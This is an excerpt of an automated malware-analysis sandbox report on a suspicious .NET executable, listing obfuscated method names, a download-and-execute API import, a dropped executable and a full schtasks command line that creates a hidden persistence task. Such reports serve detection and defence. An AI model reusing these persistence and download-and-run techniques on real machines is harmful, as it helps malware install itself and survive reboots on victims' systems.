              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.csHigh entropy of concatenated method names: 'ITEJQ2W8g6', 'QpBJGTCTkU', 'SdpJs2Iipt', 'dU0JPX8PXj', 'CgXJxQYDT8', 'NV2JCJU866', 'palJFytWfj', 'hI0J2dixcn', 'rdWJwrbfPW', 'qYAJgWiMsk'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, xDB6PJ8ZAA2Vc38ho2.csHigh entropy of concatenated method names: 'T1nCQVBpIX', 'xAcCsFBGNV', 'uKfCxasdDp', 'yx1CFhQNyd', 'HdnC2yopUl', 'jR9xiXUNEq', 'hdmxfBSuSe', 'sInx016fRH', 'dTBxjvyOTs', 'Kpkx5GcuDj'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, gn7PDCv78mC8RSHZAsG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QlsSM8qyMT', 'Y6TSBk4EGL', 'cU5ScgruVM', 'mNtSSoAZfG', 'OvnSR8Rfk5', 'Ac0SHTr99l', 'YnRSNsUuQP'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, iklBj6nh8xKEL1t5aN.csHigh entropy of concatenated method names: 'XF4FGi93Ph', 'A3DFPGNs5F', 'LSLFCp83RN', 'lhyCovT9YJ', 'RLsCzm4UBO', 'sq7FuY7viB', 'aGYFv8bcQb', 'hpqFa3LrUq', 'qd9FJEx8SJ', 'RoXF78w44f'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, maF3W0bye86jqflJPh.csHigh entropy of concatenated method names: 'nPDqeC14Ip', 'sg0qO3cpKq', 'zdNq84oNv1', 'gadqd5ec62', 'bONqWL5Tyu', 'fqMqKt6k1Z', 't0hqnfgqcx', 'ynJq6yqIrl', 'JlfqX2nsEQ', 'iNlqIqwx3h'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, ilyiiFeo9pEQDT6PeR.csHigh entropy of concatenated method names: 'oZks3AlmCh', 'Rjksk5d6Qh', 'JWQsV4OUHE', 'bw9smrVk5u', 'FNAsiXsyyP', 'uwwsfF1jdN', 'Uuvs0HofqK', 'mP8sjIeSHA', 'SNAs56uO3H', 'CjlsoRUgiF'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, wsToelauAL4QSYIHRl.csHigh entropy of concatenated method names: 'rl4p1bIZi', 'VVN4LJgF9', 'c321M6roi', 'JjeEKwxKn', 'aLSOuDB4G', 'jEUrMN7Qp', 'VR7deDj3HpdnaQMDSL', 'TLjRAmMOGtBXPTjpq8', 'EEcDwBGmQ', 'gdcBC9bdI'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, ejF1favvTDacTwdwLoy.csHigh entropy of concatenated method names: 'hdMBoKdd1j', 'n9qBzkof0O', 'huecurBK5d', 'ASTcvtEpH8', 'gBncaixFNS', 'BLucJWZneg', 'yO7c7gs9r5', 'hDPcQghw0Q', 'ahGcG3yvV0', 'yYUcsLn2RR'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, nrTMXVzus5p3wVwY83.csHigh entropy of concatenated method names: 'iZWB1WOjD1', 'dttBerPcxu', 'tiMBOIRGqO', 'aoLB8PHZGi', 'KD1BdlTofb', 'uldBWX7Zry', 'u5eBKFVk5V', 'drTBNRvvR6', 'aLmBThmqr3', 'PYHBAH3yu6'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, Ov9AGc7SIaCE1ftaPC.csHigh entropy of concatenated method names: 'z3CvFlyiiF', 'Y9pv2EQDT6', 'gEqvgepEsg', 'vK3vhNXOQ9', 'pxSvyQ5TDB', 'LPJvLZAA2V', 'U3nLx0TUPafp9sXpA0', 'hbQrROrfrd01VRs3Pj', 'Uv2vvjy9q9', 'HLGvJug2BJ'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, NOQ9uxrnD6fd9LxSQ5.csHigh entropy of concatenated method names: 'vPOxlMLpNp', 'odpxE8vQ9n', 'JmwPZKLh45', 'XbPPWjVR9w', 'a2DPKP3IVF', 'asYPYXRuDQ', 'so6Pnvp1Sc', 'gnQP6iP2yL', 'jm7P97d5sP', 'PpyPXs2VRq'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, DYSqfG57jlfxJj6XDl.csHigh entropy of concatenated method names: 'ENwM81D6Rj', 'J9uMdYqwvX', 'dLWMZ7JKNb', 'X1pMWl6Mhp', 'wCOMKehgAA', 'oM5MYKUw5x', 'wCNMnoVwPS', 'GCKM6BNFRm', 'VhoM9xUJqO', 'a4HMXg1CV7'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, A4sPow0AQmW0L4yTTd.csHigh entropy of concatenated method names: 'chvMyZBGZO', 'fVnMU0yfuT', 'eqPMMcn2Oy', 'g4DMckFgSS', 'lG1MRF1bQc', 'ATxMNEinch', 'Dispose', 'll5DGkj54t', 'FnODsBhhqR', 'YT7DP2CaYr'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, TwuCJPVNKQBdk2rjXt.csHigh entropy of concatenated method names: 'ToString', 'zi0LIC1l0u', 'epcLdIQs6N', 'A6VLZKyDns', 'gkOLWEOKgU', 'BKjLKRg2eX', 'ox6LYmoJh2', 'NWkLnSteon', 'Ti5L61DGti', 'PHdL9j4vdX'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, T5YTX1WQkmmqWAJ8l4.csHigh entropy of concatenated method names: 'Yt4CNdLV5a', 'LylCT3Ml5U', 'JEXCpCEYyZ', 'l93C4xBRgY', 'D6iC1cHxJ4', 'c9pCELIKhQ', 'drFCO8wq3H', 'eY6CrtmpNM', 'AlRZP7X3PSXjjsbcKb9', 'WuCVElXe0qMx7nHrhu2'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, nONc9n3HVcDQ9CoFUl.csHigh entropy of concatenated method names: 'DwSyX5IHdC', 'E9qytN1qHP', 'wL8y3hFfeK', 'kPmykbLlwA', 'DmEydMpUit', 'gBlyZCLVXJ', 'N9tyWFOmDO', 's2jyKJraH3', 'q7HyYF73U8', 'n2PynnQgmu'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, quwUQi90ioWypYE7oF.csHigh entropy of concatenated method names: 'qDoFTfXm7T', 'PWxFAp9sJ8', 'fssFpcwNk9', 'JA3F4hhd5c', 'hApFlf38qp', 'PvMF1O8CDI', 'z77FEctfvJ', 'V93Fe54M6S', 'xc0FOhN891', 'gByFr5nkmP'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, J1hgTPOEqepEsgRK3N.csHigh entropy of concatenated method names: 'WJpP4jqG63', 'PlkP1cQorm', 'wGYPeo8hR5', 'hSbPOc4ZNX', 'u7PPyJwhsE', 'QpQPLKp18b', 'GptPUCrm5D', 'JGvPD6KBET', 'UxUPMfgBJr', 'fL8PBu2RDd'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, S05RV5fOjYvyiPaZTY.csHigh entropy of concatenated method names: 'IXXUjt6UF5', 'YcOUo9eGAC', 'h0qDuFU5DV', 'afEDv8uYA0', 'DRKUIBpJpP', 'h6bUtMJcZf', 'L06UbDy8xt', 'mcrU3IuqLD', 'YTuUkjmbZs', 'tN5UV5ataS'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, I1tqhMsitN66Pt9vOL.csHigh entropy of concatenated method names: 'Dispose', 'TW0v5L4yTT', 'Vftad1hEr6', 'z8Ujmv4Q0c', 'G6MvoWJZSY', 'opWvzHKdJt', 'ProcessDialogKey', 'YveauYSqfG', 'djlavfxJj6', 'NDlaa69xFA'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, pPBPfxvJqfrSovQWaVx.csHigh entropy of concatenated method names: 'lfccokR6Ln', 'AcKczE3wn1', 'JmhSuH4up9', 'SUmt53hE53WSdqZAZ4b', 'B6Yud51bqcSuUKx3Ek6', 'BmTOQ51zrOVFOAroM8o', 'ijATOjhDhfpJlFnytyw', 'H92O1OhXITdcCp18io2'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, L9xFARoPmTUYlrdcmh.csHigh entropy of concatenated method names: 'lQMBPFiKy6', 'VegBxMpp7B', 'MDvBCnuMVE', 'vA2BFbn8qt', 'vGcBMbDo1I', 'a7xB2HyjBi', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.csHigh entropy of concatenated method names: 'ITEJQ2W8g6', 'QpBJGTCTkU', 'SdpJs2Iipt', 'dU0JPX8PXj', 'CgXJxQYDT8', 'NV2JCJU866', 'palJFytWfj', 'hI0J2dixcn', 'rdWJwrbfPW', 'qYAJgWiMsk'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, xDB6PJ8ZAA2Vc38ho2.csHigh entropy of concatenated method names: 'T1nCQVBpIX', 'xAcCsFBGNV', 'uKfCxasdDp', 'yx1CFhQNyd', 'HdnC2yopUl', 'jR9xiXUNEq', 'hdmxfBSuSe', 'sInx016fRH', 'dTBxjvyOTs', 'Kpkx5GcuDj'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, gn7PDCv78mC8RSHZAsG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QlsSM8qyMT', 'Y6TSBk4EGL', 'cU5ScgruVM', 'mNtSSoAZfG', 'OvnSR8Rfk5', 'Ac0SHTr99l', 'YnRSNsUuQP'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, iklBj6nh8xKEL1t5aN.csHigh entropy of concatenated method names: 'XF4FGi93Ph', 'A3DFPGNs5F', 'LSLFCp83RN', 'lhyCovT9YJ', 'RLsCzm4UBO', 'sq7FuY7viB', 'aGYFv8bcQb', 'hpqFa3LrUq', 'qd9FJEx8SJ', 'RoXF78w44f'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, maF3W0bye86jqflJPh.csHigh entropy of concatenated method names: 'nPDqeC14Ip', 'sg0qO3cpKq', 'zdNq84oNv1', 'gadqd5ec62', 'bONqWL5Tyu', 'fqMqKt6k1Z', 't0hqnfgqcx', 'ynJq6yqIrl', 'JlfqX2nsEQ', 'iNlqIqwx3h'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, ilyiiFeo9pEQDT6PeR.csHigh entropy of concatenated method names: 'oZks3AlmCh', 'Rjksk5d6Qh', 'JWQsV4OUHE', 'bw9smrVk5u', 'FNAsiXsyyP', 'uwwsfF1jdN', 'Uuvs0HofqK', 'mP8sjIeSHA', 'SNAs56uO3H', 'CjlsoRUgiF'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, wsToelauAL4QSYIHRl.csHigh entropy of concatenated method names: 'rl4p1bIZi', 'VVN4LJgF9', 'c321M6roi', 'JjeEKwxKn', 'aLSOuDB4G', 'jEUrMN7Qp', 'VR7deDj3HpdnaQMDSL', 'TLjRAmMOGtBXPTjpq8', 'EEcDwBGmQ', 'gdcBC9bdI'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, ejF1favvTDacTwdwLoy.csHigh entropy of concatenated method names: 'hdMBoKdd1j', 'n9qBzkof0O', 'huecurBK5d', 'ASTcvtEpH8', 'gBncaixFNS', 'BLucJWZneg', 'yO7c7gs9r5', 'hDPcQghw0Q', 'ahGcG3yvV0', 'yYUcsLn2RR'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, nrTMXVzus5p3wVwY83.csHigh entropy of concatenated method names: 'iZWB1WOjD1', 'dttBerPcxu', 'tiMBOIRGqO', 'aoLB8PHZGi', 'KD1BdlTofb', 'uldBWX7Zry', 'u5eBKFVk5V', 'drTBNRvvR6', 'aLmBThmqr3', 'PYHBAH3yu6'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, Ov9AGc7SIaCE1ftaPC.csHigh entropy of concatenated method names: 'z3CvFlyiiF', 'Y9pv2EQDT6', 'gEqvgepEsg', 'vK3vhNXOQ9', 'pxSvyQ5TDB', 'LPJvLZAA2V', 'U3nLx0TUPafp9sXpA0', 'hbQrROrfrd01VRs3Pj', 'Uv2vvjy9q9', 'HLGvJug2BJ'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, NOQ9uxrnD6fd9LxSQ5.csHigh entropy of concatenated method names: 'vPOxlMLpNp', 'odpxE8vQ9n', 'JmwPZKLh45', 'XbPPWjVR9w', 'a2DPKP3IVF', 'asYPYXRuDQ', 'so6Pnvp1Sc', 'gnQP6iP2yL', 'jm7P97d5sP', 'PpyPXs2VRq'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, DYSqfG57jlfxJj6XDl.csHigh entropy of concatenated method names: 'ENwM81D6Rj', 'J9uMdYqwvX', 'dLWMZ7JKNb', 'X1pMWl6Mhp', 'wCOMKehgAA', 'oM5MYKUw5x', 'wCNMnoVwPS', 'GCKM6BNFRm', 'VhoM9xUJqO', 'a4HMXg1CV7'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, A4sPow0AQmW0L4yTTd.csHigh entropy of concatenated method names: 'chvMyZBGZO', 'fVnMU0yfuT', 'eqPMMcn2Oy', 'g4DMckFgSS', 'lG1MRF1bQc', 'ATxMNEinch', 'Dispose', 'll5DGkj54t', 'FnODsBhhqR', 'YT7DP2CaYr'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, TwuCJPVNKQBdk2rjXt.csHigh entropy of concatenated method names: 'ToString', 'zi0LIC1l0u', 'epcLdIQs6N', 'A6VLZKyDns', 'gkOLWEOKgU', 'BKjLKRg2eX', 'ox6LYmoJh2', 'NWkLnSteon', 'Ti5L61DGti', 'PHdL9j4vdX'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, T5YTX1WQkmmqWAJ8l4.csHigh entropy of concatenated method names: 'Yt4CNdLV5a', 'LylCT3Ml5U', 'JEXCpCEYyZ', 'l93C4xBRgY', 'D6iC1cHxJ4', 'c9pCELIKhQ', 'drFCO8wq3H', 'eY6CrtmpNM', 'AlRZP7X3PSXjjsbcKb9', 'WuCVElXe0qMx7nHrhu2'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, nONc9n3HVcDQ9CoFUl.csHigh entropy of concatenated method names: 'DwSyX5IHdC', 'E9qytN1qHP', 'wL8y3hFfeK', 'kPmykbLlwA', 'DmEydMpUit', 'gBlyZCLVXJ', 'N9tyWFOmDO', 's2jyKJraH3', 'q7HyYF73U8', 'n2PynnQgmu'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, quwUQi90ioWypYE7oF.csHigh entropy of concatenated method names: 'qDoFTfXm7T', 'PWxFAp9sJ8', 'fssFpcwNk9', 'JA3F4hhd5c', 'hApFlf38qp', 'PvMF1O8CDI', 'z77FEctfvJ', 'V93Fe54M6S', 'xc0FOhN891', 'gByFr5nkmP'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, J1hgTPOEqepEsgRK3N.csHigh entropy of concatenated method names: 'WJpP4jqG63', 'PlkP1cQorm', 'wGYPeo8hR5', 'hSbPOc4ZNX', 'u7PPyJwhsE', 'QpQPLKp18b', 'GptPUCrm5D', 'JGvPD6KBET', 'UxUPMfgBJr', 'fL8PBu2RDd'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, S05RV5fOjYvyiPaZTY.csHigh entropy of concatenated method names: 'IXXUjt6UF5', 'YcOUo9eGAC', 'h0qDuFU5DV', 'afEDv8uYA0', 'DRKUIBpJpP', 'h6bUtMJcZf', 'L06UbDy8xt', 'mcrU3IuqLD', 'YTuUkjmbZs', 'tN5UV5ataS'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, I1tqhMsitN66Pt9vOL.csHigh entropy of concatenated method names: 'Dispose', 'TW0v5L4yTT', 'Vftad1hEr6', 'z8Ujmv4Q0c', 'G6MvoWJZSY', 'opWvzHKdJt', 'ProcessDialogKey', 'YveauYSqfG', 'djlavfxJj6', 'NDlaa69xFA'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, pPBPfxvJqfrSovQWaVx.csHigh entropy of concatenated method names: 'lfccokR6Ln', 'AcKczE3wn1', 'JmhSuH4up9', 'SUmt53hE53WSdqZAZ4b', 'B6Yud51bqcSuUKx3Ek6', 'BmTOQ51zrOVFOAroM8o', 'ijATOjhDhfpJlFnytyw', 'H92O1OhXITdcCp18io2'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, L9xFARoPmTUYlrdcmh.csHigh entropy of concatenated method names: 'lQMBPFiKy6', 'VegBxMpp7B', 'MDvBCnuMVE', 'vA2BFbn8qt', 'vGcBMbDo1I', 'a7xB2HyjBi', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.csHigh entropy of concatenated method names: 'ITEJQ2W8g6', 'QpBJGTCTkU', 'SdpJs2Iipt', 'dU0JPX8PXj', 'CgXJxQYDT8', 'NV2JCJU866', 'palJFytWfj', 'hI0J2dixcn', 'rdWJwrbfPW', 'qYAJgWiMsk'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, xDB6PJ8ZAA2Vc38ho2.csHigh entropy of concatenated method names: 'T1nCQVBpIX', 'xAcCsFBGNV', 'uKfCxasdDp', 'yx1CFhQNyd', 'HdnC2yopUl', 'jR9xiXUNEq', 'hdmxfBSuSe', 'sInx016fRH', 'dTBxjvyOTs', 'Kpkx5GcuDj'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, gn7PDCv78mC8RSHZAsG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QlsSM8qyMT', 'Y6TSBk4EGL', 'cU5ScgruVM', 'mNtSSoAZfG', 'OvnSR8Rfk5', 'Ac0SHTr99l', 'YnRSNsUuQP'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, iklBj6nh8xKEL1t5aN.csHigh entropy of concatenated method names: 'XF4FGi93Ph', 'A3DFPGNs5F', 'LSLFCp83RN', 'lhyCovT9YJ', 'RLsCzm4UBO', 'sq7FuY7viB', 'aGYFv8bcQb', 'hpqFa3LrUq', 'qd9FJEx8SJ', 'RoXF78w44f'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, maF3W0bye86jqflJPh.csHigh entropy of concatenated method names: 'nPDqeC14Ip', 'sg0qO3cpKq', 'zdNq84oNv1', 'gadqd5ec62', 'bONqWL5Tyu', 'fqMqKt6k1Z', 't0hqnfgqcx', 'ynJq6yqIrl', 'JlfqX2nsEQ', 'iNlqIqwx3h'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, ilyiiFeo9pEQDT6PeR.csHigh entropy of concatenated method names: 'oZks3AlmCh', 'Rjksk5d6Qh', 'JWQsV4OUHE', 'bw9smrVk5u', 'FNAsiXsyyP', 'uwwsfF1jdN', 'Uuvs0HofqK', 'mP8sjIeSHA', 'SNAs56uO3H', 'CjlsoRUgiF'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, wsToelauAL4QSYIHRl.csHigh entropy of concatenated method names: 'rl4p1bIZi', 'VVN4LJgF9', 'c321M6roi', 'JjeEKwxKn', 'aLSOuDB4G', 'jEUrMN7Qp', 'VR7deDj3HpdnaQMDSL', 'TLjRAmMOGtBXPTjpq8', 'EEcDwBGmQ', 'gdcBC9bdI'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, ejF1favvTDacTwdwLoy.csHigh entropy of concatenated method names: 'hdMBoKdd1j', 'n9qBzkof0O', 'huecurBK5d', 'ASTcvtEpH8', 'gBncaixFNS', 'BLucJWZneg', 'yO7c7gs9r5', 'hDPcQghw0Q', 'ahGcG3yvV0', 'yYUcsLn2RR'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, nrTMXVzus5p3wVwY83.csHigh entropy of concatenated method names: 'iZWB1WOjD1', 'dttBerPcxu', 'tiMBOIRGqO', 'aoLB8PHZGi', 'KD1BdlTofb', 'uldBWX7Zry', 'u5eBKFVk5V', 'drTBNRvvR6', 'aLmBThmqr3', 'PYHBAH3yu6'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, Ov9AGc7SIaCE1ftaPC.csHigh entropy of concatenated method names: 'z3CvFlyiiF', 'Y9pv2EQDT6', 'gEqvgepEsg', 'vK3vhNXOQ9', 'pxSvyQ5TDB', 'LPJvLZAA2V', 'U3nLx0TUPafp9sXpA0', 'hbQrROrfrd01VRs3Pj', 'Uv2vvjy9q9', 'HLGvJug2BJ'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, NOQ9uxrnD6fd9LxSQ5.csHigh entropy of concatenated method names: 'vPOxlMLpNp', 'odpxE8vQ9n', 'JmwPZKLh45', 'XbPPWjVR9w', 'a2DPKP3IVF', 'asYPYXRuDQ', 'so6Pnvp1Sc', 'gnQP6iP2yL', 'jm7P97d5sP', 'PpyPXs2VRq'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, DYSqfG57jlfxJj6XDl.csHigh entropy of concatenated method names: 'ENwM81D6Rj', 'J9uMdYqwvX', 'dLWMZ7JKNb', 'X1pMWl6Mhp', 'wCOMKehgAA', 'oM5MYKUw5x', 'wCNMnoVwPS', 'GCKM6BNFRm', 'VhoM9xUJqO', 'a4HMXg1CV7'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, A4sPow0AQmW0L4yTTd.csHigh entropy of concatenated method names: 'chvMyZBGZO', 'fVnMU0yfuT', 'eqPMMcn2Oy', 'g4DMckFgSS', 'lG1MRF1bQc', 'ATxMNEinch', 'Dispose', 'll5DGkj54t', 'FnODsBhhqR', 'YT7DP2CaYr'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, TwuCJPVNKQBdk2rjXt.csHigh entropy of concatenated method names: 'ToString', 'zi0LIC1l0u', 'epcLdIQs6N', 'A6VLZKyDns', 'gkOLWEOKgU', 'BKjLKRg2eX', 'ox6LYmoJh2', 'NWkLnSteon', 'Ti5L61DGti', 'PHdL9j4vdX'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, T5YTX1WQkmmqWAJ8l4.csHigh entropy of concatenated method names: 'Yt4CNdLV5a', 'LylCT3Ml5U', 'JEXCpCEYyZ', 'l93C4xBRgY', 'D6iC1cHxJ4', 'c9pCELIKhQ', 'drFCO8wq3H', 'eY6CrtmpNM', 'AlRZP7X3PSXjjsbcKb9', 'WuCVElXe0qMx7nHrhu2'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, nONc9n3HVcDQ9CoFUl.csHigh entropy of concatenated method names: 'DwSyX5IHdC', 'E9qytN1qHP', 'wL8y3hFfeK', 'kPmykbLlwA', 'DmEydMpUit', 'gBlyZCLVXJ', 'N9tyWFOmDO', 's2jyKJraH3', 'q7HyYF73U8', 'n2PynnQgmu'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, quwUQi90ioWypYE7oF.csHigh entropy of concatenated method names: 'qDoFTfXm7T', 'PWxFAp9sJ8', 'fssFpcwNk9', 'JA3F4hhd5c', 'hApFlf38qp', 'PvMF1O8CDI', 'z77FEctfvJ', 'V93Fe54M6S', 'xc0FOhN891', 'gByFr5nkmP'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, J1hgTPOEqepEsgRK3N.csHigh entropy of concatenated method names: 'WJpP4jqG63', 'PlkP1cQorm', 'wGYPeo8hR5', 'hSbPOc4ZNX', 'u7PPyJwhsE', 'QpQPLKp18b', 'GptPUCrm5D', 'JGvPD6KBET', 'UxUPMfgBJr', 'fL8PBu2RDd'
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, S05RV5fOjYvyiPaZTY.csHigh entropy of concatenated method names: 'IXXUjt6UF5', 'YcOUo9eGAC', 'h0qDuFU5DV', 'afEDv8uYA0', 'DRKUIBpJpP', 'h6bUtMJcZf', 'L06UbDy8xt', 'mcrU3IuqLD', 'YTuUkjmbZs', 'tN5UV5ataS'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
